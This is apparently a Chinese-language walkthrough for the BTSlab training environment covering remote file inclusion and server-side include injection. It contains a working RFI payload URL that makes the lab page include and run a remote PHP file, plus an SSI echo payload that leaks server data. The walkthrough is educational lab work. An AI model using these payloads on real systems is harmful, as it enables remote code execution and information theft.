BTS测试实验室--远程文件包含和服务器端注入攻略

远程文件包含

BTS测试实验室--远程文件包含和服务器端注入攻略

构造payload:http://127.0.0.1/btslab/vulnerability/rfi/RFI.php?file=http://192.168.1.129/test2/demo1.php
BTS测试实验室--远程文件包含和服务器端注入攻略

可以看到,远程包含的文件被解析执行了。

下面来看看远程文件中的内容是什么?
BTS测试实验室--远程文件包含和服务器端注入攻略

所以说,对于存在远程文件包含漏洞的情况,会造成任意代码被执行的危害。有关这个漏洞更多的实例或讲解,可以自行在网上搜索。

服务器端包含注入

BTS测试实验室--远程文件包含和服务器端注入攻略

输入任意用户名,如aaa,点击提交,得到下面的输出页面
BTS测试实验室--远程文件包含和服务器端注入攻略

payload:<!--#echo var="DATE_LOCAL"-->,可以看到,页面输出了当前的时间
BTS测试实验室--远程文件包含和服务器端注入攻略

通过这种方式来利用服务器端注入,我们可以获取服务器的ip、定位、时间等信息。有关ssi的漏洞远不止这些,想要了解更多,可以搜索更多有关该漏洞的信息。